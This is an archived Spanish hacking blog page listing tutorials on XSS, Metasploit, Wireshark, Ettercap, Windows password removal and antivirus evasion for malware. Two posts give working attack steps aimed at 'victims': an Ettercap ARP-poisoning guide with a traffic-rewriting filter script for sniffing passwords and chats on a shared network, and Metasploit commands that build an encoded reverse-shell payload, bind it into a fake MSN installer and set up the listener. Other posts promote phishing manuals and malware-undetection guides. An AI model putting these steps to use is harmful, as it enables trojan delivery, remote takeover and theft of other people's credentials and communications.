Mostrando entradas con la etiqueta Turiales. Mostrar todas las entradas
Mostrando entradas con la etiqueta Turiales. Mostrar todas las entradas

14 jul. 2011

Taller Auditoría & Pentest 2011


Muchos están de vacaciones de verano, otros de invierno, etc... Así que les posteo un texto para los momentos de ocio.

No puedo acordarme de donde lo saqué pero el autor es Bernabé Muñoz. Lo leí absolutamente completo y es muy muy bueno, el documento si lo tuviera que rankear diría que está entre básico e intermedio, pero es muy detallista e ilustrado, lo que hace que sea una gran herramienta de estudio. Lo mejor de todo es que está muy actualizado, ya que hay mucho texto obsoleto rondando por ahí...

Aquí un index del taller:

3 may. 2011

Ezine Level-23 I

Level-23 ha sacado una revista, la cual está de verdad muy interesante, trae de todo un poco y está todo muy bien explicado.

Aquí el Index de la Ezine:

Manual Estenografía
Manual Xul
Intrusión a un Router Mediante Telnet
Instalar UbuntuStudio
Telnet y SSH
XSS TUNELING
Introducción a XSS
Curso Básico de Programación en HTML y CSS
Manual Inyección Sql
Arquitectura de Computadores
Manual Phiser Rapidshare 2009
Manual Phiser Megaupload 2009

30 abr. 2011

Cómo Saber por Donde ha Pasado tu iPhone

Bueno, hace poco se supo de una funcionalidad no deseada en el Iphone y Ipad, que consistía en que al tener GPS incluido guardaba la posición de tu Iphone y Ipad en un archivo oculto llamado consolidated.db, este archivo contiene coordenadas de latitud y longitud con fecha y hora, las coordenadas nunca son exactamente iguales pero tienen informacion muy detallada. El mayor problema se daba en que ese archivo era transferido a cualquier computador con el que fuera sincronizado este gadget.

A consecuencia de esto Hispasec ha dejado una análisis forense a tal función del Iphone/Ipad muy clara y con imagenes donde eseñan como manipular consolidated.db para ver en Google Maps la geolocalización del aparato.

[INTECO] ¿Está protegido tu navegador web?

 INTECO ha publicado un texto exponiendo sobre sobre riesgos del navegador web (Como JavaScript, Java, ActiveX, Cookies, Plugins, Phishing y Otros...), Configuración por defecto de los Navegadores (La seguridad por defecto de los Navegadores) y respectivos consejos de seguridad para dejar tu Navegador favorito lo más seguro posible.

El navegador web se ha convertido en una herramienta cada vez más versátil y polivalente. A través del navegador, los usuarios de Internet llevan a cabo muchas funcionalidades que antes realizaban a través de otros programas.

14 mar. 2011

[Paper] Indetectando Malwares Cercando Firmas

ANTRAX a publicado en su blog un Tutorial de cómo Indetectabilizar Malwares sacando firmas de antivirus. Lo recomiendo 100% para todos aquellos que gustan del mundo del Malware.

25 feb. 2011

Tutorial de XSS, XSF, CSRF, XFS, XZS, XAS, XRS & XSSDoS

Leyendo por ahí, me encuentro con un mega tutorial XSS hecho por lord epsylon el cual comprende una amplia gama de variaciones y/o tipos de XSS (por no decir todos), son 174 páginas y como me encanta leer y a parte que está muy bien hecho (y en español), ayer en la noche me lo leí entero. 100% recomendado, muy gráfico y muy claro, muchas páginas, pero al leerlo se hace muy rápido. Yo personalmente aprendí  y repasé mucho al leerlo ;)

[Videotutoriales Metasploit] Uso Extensivo

Bueno, Aquí les traigo 3 videos cortesía de Japtron quien a hecho un excelente trabajo con estos videotutoriales, los videos están hechos contra una máquina Metasploitable (Es un sistema operativo (Ubuntu 8.04) VMware con varias vulnerabilidades para ser explotadas con Metasploit) lo que no quita grado de dificultad. En los videos, Japtron nos enseña el manejo protocolar de Metasploit, Escala de Privilegios, PostgreSQL, SSH, Samba, entre muchos otros. Recomendado de ver no solamente los principiantes:

23 feb. 2011

[Tutorial Wireshark] Análisis de tráfico by INTECO-CERT

Bueno, en http://cert.inteco.es/ han publicado un excelente tuto de Análisis de tráfico con Wireshark. Con el que que pretende servir de apoyo a administradores y técnicos de seguridad a la hora de analizar tráfico para detectar problemas o ataques de red.

7 ene. 2011

[Tutorial] Advanced And Comprehensive Use Of Nmap (Español)

Bueno, hace algún tiempo que juh me ha enviado un texto de Nmap y que no he podido publicar por falta de tiempo y porque lo quería leer completo ;)

En el texto se explica muy claramente como usar Nmap desde 0 (omitiendo la instalación, pero eso lo hacen ustedes mismos xD).

23 nov. 2010

Cómo instalar un control de Xbox 360 en Windows XP

Era recurrente la pregunta de cómo instalar el control de Xbox 360 en el pc y hacer que vibre con los juegos, se hizo esta mini-guía con el método que resultó el más fácil de todos los que se encuentran en la red.

Primero que todo, están en Rapidshare los archivos necesarios para poder instalar correctamente el control. Es un conjunto de 4 archivos:

21 nov. 2010

Guía para borrar datos de un dispositivo móvil

Como mencionamos en repetidas ocasiones, el manejo de la información y los datos son temas sensibles, y pueden exponer al dueño de estos ante situaciones no deseadas. Es por ello que con el boom de los smartphones se debería de tomar  mayor conciencia de qué datos podemos entregar cuando vendemos, cambiamos o dejamos de lado nuestro equipo por otro nuevo.

[Indetectando Malware] Método FakeProc

Bueno, hace mucho tiempo leyendo en indetectables.net me encontré con un tutorial para Indetectabilizar Malware, decidí subirlo porque nunca está demás... este es un tutorial en PDF donde explican un método para Indetectabilizar un Malware (Virus, Worm, Troyano, Joke, Bot, etc...) modificando el código fuente para confundir a los antivirus con buncles muy extensos. Sin duda anecdótico, pero útil:

9 nov. 2010

Instalar Android 2.2.1 Froyo en iPhone 3G / 2G (Sin la necesidad de un computador)

Probablemente la forma más fácil de la mayoría para instalar Android en un iPhone 2G / 3G es a través de iPhoDroid , que cubría anteriormente. Pero el problema es que se debe tener un equipo para ejecutar todo el proceso de instalar Android en el iPhone 2G/3G. Pero gracias a Bootlace 2.1, ahora se puede instalar Android 2.2.1 Froyo en un iPhone con jailbroken sin necesidad de conectarlo a un PC o Mac!


2 oct. 2010

Ataques XSS con javascript por diversión y beneficio

Este es un excelente tutorial donde explican bastante bien este tipo de vulnerabilidades:

De las muchas vulnerabilidades que podemos encontrar en las aplicaciones Web una de las más comunes es el XSS o Cross-Site-Scripting. Consiste esencialmente en introducir código en páginas web para que lo ejecute cualquiera que acceda a ellas.

Aunque es relativamente fácil protegerse ante estos ataques, existen muchas maneras de saltarse filtros. En este taller se probaran distintas diversiones con javascript, desde el hola mundo a cosas más complejas.
Pello Xabier Altadill – Instituto Cuatrovientos


Tabla de contenidos:
Ataques XSS con javascript como diversión y beneficio .......................1
(0). Escenario y primera prueba .............................................2
(1). Hola mundo .............................................................3
(2). Dando por el culo con alerts ...........................................4
(3). Vámonos de aquí ........................................................5
(4). Jugando con el objeto window ...........................................6
(5). Solicitando datos al usuario ...........................................7
(6). Capturando eventos .....................................................8
(7). Robo de cookies y sesiones .............................................10
(8). Session Ridding ........................................................11
(9). Adueñandonos del documento a través de DOM .............................12
(9.1). ¿Qué es eso del DOM? .................................................12
(9.2). Leer, modificar, añadir, reemplazar y eliminar .......................13
(10). AJAX: una nueva era ...................................................18
(10.1). Mandando datos por lo bajini ........................................19
(10.2). Mandando datos fuera ................................................23
(10.3). Snifando datos ......................................................24
(11). Formas de introducir XSS ..............................................25
Referencias, webs, artículos:................................................25

 Descargar [PDF] Ataques XSS con javascript por diversión y beneficio.

Artículos relacionados:
Todo Sobre XSS!!
XSS a fondo

Fuente: http://4party.cuatrovientos.org/

30 sept. 2010

Manual básico Ettercap (entorno gráfico)

Esta es una guia básica sobre la utilización de ettercap. Este programa que nos permite sniffar el tráfico de red y obtener  así las  contraseñas escritas por otros usuarios de nuestra red, además también permite leer, por ejemplo, las conversaciones del messenger u otros programas de mensajería instantánea.

1 - Primero tenemos que descargar el ettercap, la ultima versión es la 0.7.3 y
esta disponible tanto para windows como para linux:

Windows:
http://sourceforge.net/projects/ettercap/files/unofficial binaries/windows/

Linux:
http://ettercap.sourceforge.net/download.php

o (en el caso de Ubuntu)
# apt-get install ettercap-gtk

2 - Lo instalamos.

Si tienes la versión para compilar de linux:
# ./configure
# make
# make install

A partir de ahora lo interesante:

3 - Arrancamos el ettercap (en caso de linux como root, ya que sino no nos permitira seleccionar la interfaz de red a utilizar).

4 - Pestaña Sniff>Unified Sniffing

5 - Seleccionamos la interfaz que esta conectada a la red que queremos sniffar,
despues le damos a "Aceptar".

6 - Pestaña Host>Scan for hosts.

En la parte de abajo de la pantalla aparecerá algo como " X hosts added to the hosts list..."
(X sera un numero correspondiente al numero de maquinas conectadas a la red).

7 - Pestaña Host>Host list.

Ahora aparecerán las IPs de las maquinas conectadas, hay que tener en cuenta que el router también aparece (No aparece nuestro PC).

8 - Seleccionamos la IP del ordenador a atacar y pulsamos "Add to Target 1", después el router "Add to Target 2".

Ahora ya tenemos los objetivos marcados, pero antes de dar el siguiente paso tenemos que tener en cuenta que vamos a utilizar una técnica llamada Man In The Middle (MITM) y lo que haremos sera que todos los paquetes que van dirigidos al PC atacado pasen por nosotros, con lo que si nosotros nos desconectamos sin detener el ataque MITM nuestra víctima se quedara sin conexión por un tiempo, mientras se reinician las tablas arp.

9 - Pestaña Mitm>ARP Poisoning. Ahora marcamos la pestaña "Sniff remote connections" y pulsamos "Aceptar".

10 - Pestaña Start>Start sniffing.

Con esto estaremos snifando el trafico de red.

11 - Pestaña  View>Connections. Aquí podemos ver todas las conexiones y hacemos doble click sobre alguna podemos ver los datos que contiene, entre ellos conversaciones del messenger, usuarios y contraseñas, etc.

Ahora es cuestión de paciencia.

Bueno un saludo a todos y espero que os sirva.

Respeto a los filtros:

Este filtro se utiliza para cambiar las imagenes de la maquina a la que le hayamos hecho el man in the middle.

Primero tenemos que obtener el script del filtro, para esto vamos a la siguiente pagina y copiamos el script.


El script es el siguiente:
############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

Ahora modificamos la dirección de las imágenes por las que nosotros queramos, por ejemplo la de portalhacker.net, quedaría así:
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
replace("IMG SRC=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
msg("Filter Ran.\n");
}

Lo siguiente sera guardar el script con extension .filter, por ejemplo imagen.filter.

Una vez hecho esto abrimos una consola y vamos al directorio donde tenemos el imagen.filter. Una vez allí ponemos y se compilara el filtro:
etterfilter imagen.filter -o imagen.ef

Con esto nos generara el imagen.ef. Una vez creado lo copiaremos al directorio de ettercap
/usr/share/ettercap

Ahora arrancamos ettercap y realizamos el MITM. Durante el MITM vamos a la pestaña filters->load a filter.

Una vez aquí seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto ya estar el filtro aplicado y las imágenes que vea la victima serán sustituidas por las que nosotros queramos.

Autor: Aetsu

28 sept. 2010

[Video] Escondiendo Meterpreter en un instalador de MSN

Bueno... Recorriendo la web me encuentro con este video que es bastante simple y que explica muy bien como transformar un PAYLOAD a exe y como unirlo a un Instalador de MSN con Iexpress. Para luego enviárselo a la víctima y se conecte a nosotros gracias al PAYLOAD [windows/exploits/reverse_tcp] que crea una conexión inversa (osea que nuestra víctima se conecta a nosotros), lo que es muy práctico para evitar el firewall de Windows. Aquí el video, y luego procedo a explicar a los que no les haya quedado muy claro ya que el video está en inglés, pero muy fácil de entender:




Primero se procede a crear el PAYLOAD con extensión *.exe:
root@evilbox:~# cd /pentest/exploits/framework3/
root@evilbox:/pentest/exploits/framework3# ./msfpayload windows/exploits/reverse_tcp LHOST=192.168.1.64 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/payload.exe
En LHOST=192.168.1.64 se tiene que poner nuestra IP ya que la victima se va a conectar a nosotros.

En -o se pone la ruta donde se guardará el payload.exe, puede ser donde sea.

Se deja corriendo en la consola metasploit:
root@evilbox:/pentest/exploits/framework3# ./msfconsole

Luego se procede a unir payload.exe con el instalador de MSN o en su defecto cualquier exe. No voy a entrar en detalles como usar Iexpress ya que en el video es muy claro.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/exploits/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.64
msf exploit(handler) > exploit
Aquí lo único lo que hay cambiar es set LHOST 192.168.1.64 por nuestra IP, como ya expliqué antes. es para que nuestra víctima se conecta a nosotros.

Corremos el exploit con el comando exploit (obvio no XD)

Por último sólo nos queda enviar el "*.exe" (payload.exe + Instalador de MSN) a nuestra víctima y esperar que lo ejecute.

Ahora tenemos el control absoluto desde nuesta consola del PC de tu víctima.

[+] Salu2
[+] ZioneR

25 sept. 2010

[DiosDeLaRed] E-zine #2

Bueno... Hace tiempo que en Diosdelared.com se publicó la segunda E-zine de este foro donde hacen execelentes aportes. En esta E-zine se trata sobre:

  • [Metasploit] Infectando Linux con Troyano.
  • [Metasploit] Sistemas conectados en la misma Red.
  • [Fast-Track + Metasploit] PAYLOAD Automatically Generate.
  • DNS Impersonation.
  • Introducción al HTTP Hacking.
  • Disable_functions & suhosin patch.

Contenidos y Portada:


Descarga E-Zine #2 DiosDeLaRed

Fuente: http://benox.diosdelared.com/

[+] Salu2

4 sept. 2010

[Wireshark] Manual


Bueno... Les traigo un Manual bastante interesante sobre Wireshark de D14M4NT3 en donde nos enseña como leer paquetes de una red, como utilizar los filtros, como leer una conversación del MSN con Wireshark, como robar Passwords que viajan en texto plano, etc…

El texto es bastante bueno como introducción a Wireshark ya que empieza de lo básico y es bastante explicativo e ilustrativo.

Manual Wireshark
Autor: D14M4NT3
Formato: PDF
Páginas: 7
Peso: 432 KB

Fuente y web del autor: http://d14m4nt3.wordpress.com/

30 ago. 2010

Recuperar o quitar la password de Windows utilizando chntpw en Linux/Ubuntu

Recuperar una contraseña de windows utilizando Ubuntu y programa llamado chntpw.NOTA: Si deseas usar este método y no tienes instalado Ubuntu, puedes utilizar una versión “live CD” de Ubuntu y desde allí usar chntpw.

Chntpw (acrónimo de Change NT Password) es un programa que nos permite quitar o modificar las contraseñas de usuario de los sistemas Windows NT, 2k, XP, Vista y Win7 accediendo al sistema de ficheros desde un sistema Linux.

Vamos a instalarlo:
  1. Abrimos una Terminal (Aplicaciones->Accesorios->Terminal).
  2. Instalamos el paquete del programa:

    sudo apt-get install chntpw
Ahora para usarlo haremos lo siguiente:
  1. A través de la Terminal navegamos hasta la carpeta donde se almacena el fichero con las contraseñas (en casi todos los Windows es “C:/WINDOWS/system32/config”). Para ello, en Ubuntu, haremos:
    NOTA: Debemos asegurarnos antes de que la partición está montada (por ejemplo accediendo a ella desde Nautilus).

    cd /media/NOMBRE-DE-LA-PARTICION/WINDOWS/system32/config
    Donde NOMBRE-DE-LA-PARTICION es el nombre de la partición donde se encuentra instalado el Windows.

  2. Ahora crackeamos el fichero que almacena la contraseñas (normalmente se llama SAM) de la siguiente manera:


    • Si queremos quitar o modificar la contraseña al usuario administrador:

      chntpw SAM
    • Si queremos quitar o modificar la contraseña a cualquier usuario en concreto:

      chntpw -u USUARIO SAM
      Donde USUARIO es el nombre del usuario cuya contraseña deseamos liberar.

  3. Tras ejecutar el comando de crackeo nos aparecerá un menú con 5 opciones. Si queremos borrar la contraseña elegimos la opción 1 y damos a [ENTER]. Si queremos modificar la contraseña elegiremos la opción 2 y damos a [ENTER].

Fuente: http://blogofsysadmins.com/

27 ago. 2010

Instalar Metasploit en el iPhone

Este manual ha sido creado por shark0 en el cual enseña como instalar Metasploit en el iPhone. El que tenga iPhone, sin duda debería llevarlo acabo, nunca está demás tener una herramienta de pentest en tu bolsillo (quien sabe cuando sea útil), aquí el manual entero:


Bueno en este manual explicaré como instalar el Metasploit Framework en el dispositivo iPhone. Primero necesitaremos un iPhone con el llamado Jailbreak, podéis encontrar mucha información sobre como hacer el jailbreak en los diferentes Firmware, a continuación pongo algunos links que os pueden ayudar:

Jailbreak a iPhone con firmware 3.1.3 (Spirit)
Jailbreak a iPhone con firmware 3.1.2

Pagina oficial de Spirit
Pagina oficial de blackra1n // Pagina oficial de limera1n

Bueno hay mucha información sobre como hacer el Jailbreak al iPhone, continuemos... cuando tengamos el Jailbreak hecho, nos vamos al cydia y agregamos los sources de las paginas más importantes de descarga de aplicaciones para poder descargar un aplicación llamada OpenSSH :

Nos vamos a cydia/manage/sources/edit/add :

- Agregamos el source : http://apt.saurik.com/cydia, dejamos que descargue los paquetes (si aparece un error por medio de la descarga dale a ok y que siga descargando) y le damos a Done:

- Instalamos el OpenSSH, para ello vamos a el cydia/search y buscamos OpenSSH:

Esto nos ayudará a acceder/conectar al iPhone por SSH y poder subir/descargar aplicaciones en el dispositivo.. para ello en el PC necesitaremos una aplicación como por ejemplo WinSCP.

Aquí dejo un tutorial de como configurar el WinSCP para que pueda conectar con el iPhone.


Bueno, ya podemos acceder a los archivos del dispositivo por SSH, ahora viene lo mas importante, instalar el MSF, descargamos el archivo '.deb' del Metasploit en el siguiente enlace : Descargar MSF 3 (3.4)

A continuación necesitamos una segunda aplicación en nuestro iPhone, se llama MobileTerminal, lo instaláis en el cydia igual que el OpenSSH. Subimos el archivo que descargamos del Metasploit (se recomienda renombrar el archivo a msf.deb) a la carpeta /tmp/.

Luego abrimos la aplicación terminal en el iPhone y escribimos :

- su root
- Password : alpine (en mi caso)
- dpkg -i /tmp/msf.deb

Reiniciamos el iPhone cuando termine de ejecutarse y listo, ya tenemos el MSF instalado.

Para ejecutarlo vais a terminal y escribes : msfconsole

Autor: shark0
Fuente: http://foro.elhacker.net/